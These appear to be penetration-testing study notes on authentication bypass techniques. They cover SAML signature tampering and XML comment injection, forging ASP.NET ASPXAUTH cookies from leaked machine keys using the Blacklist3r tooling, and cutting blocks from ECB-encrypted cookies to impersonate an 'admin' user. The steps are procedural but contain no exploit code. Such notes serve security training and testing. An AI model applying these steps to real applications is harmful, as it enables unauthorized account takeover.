SAML Auth Bypass

Workflow

Tamper Username/Email

• A weak SAML implementation would not validate the signature and thus allow an attacker to access the account of another user.

Comment Injection

• An XML canonicalization transform is employed while signing the XML document to produce the identical signature for logically or semantically similar documents. (Different positions will still have the same meaning)

• Canonicalization engine ignores comments and whitespaces while creating a signature.

• The XML parser might parse the below example in 3 parts.

  • text: notsosecure

  • comment: <!-- this is a comment -->

  • text: user@webhacklab.com

• The XML parser returns the last node, which might allow you to log in as user@webhacklab.com

.Net Machine Key Auth Bypass

• Machine Key is used for encryption and decryption of forms authentication , cookie data, and view-state data, and for out-of-process session state identification.

• This is configured in the web.config file.

• The following are encrypted with a Machine Key

  • Authentication tokens

    • Forms(ASPXAUTH)

    • OWIN - OAUTH Token

    • ASP.NET Cookie (.AspNet.ApplicationCookie)

  • Webresource.axd & Scriptresource.axd

  • VIEWSTATE

  • CSRF Token

  • Password Reset Token

  • Role Cookie

  • Membership Passwords etc.

Testing for Leaked Machine Keys

• Tool: Blacklist3r (Notsosecure)

• Copy the 'ASPXAUTH' and test it with AspDotNetWrapper.exe

Exploitation

• Enumerate valid usernames

• Encrypt a new cookie with the privileged username.

• Replace 'ASPXAUTH' cookie during login, leading to auth bypass.

Weak Encryption

Electronic Codebook [ECB]

• ECB is an encryption mode in which the message is split into blocks of X bytes length and each block is encrypted separately using a key.

• Using ECB has multiple security implications:

  • Blocks from encrypted message can be removed without disturbing the decryption process.

  • Blocks from encrypted message can be moved around without disturbing the decryption process.

Vulnerability

• If application relies only on the ECB encryption of cookies for integrity.

  • Encryption provides confidentiality.

  • Signature provides integrity.

• ECB mode allows an attacker to tamper the encrypted data without decrypting it.

Exploitation

• Assumptions:

  • Web app does not validate the 'password' part in the cookie.

  • Cookie value is not randomized for User X for each successful login.

• URL Decode - > Base64 Decode the cookie. Check if the HEX values are repeated.

• If yes, identify the block size by creating a user/password with large string of same characters. For eg: 'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'. For example, if the hex values are repeated after 8 bytes, the block-size=8 bytes

• Assuming Block-size is 8 bytes. We will create a user 'aaaaaaaaadmin'. Decode the cookie. Delete the first 8 bytes from the cookie. Encode the new cookie using Base64. Replay this cookie with requests to impersonate user 'admin'.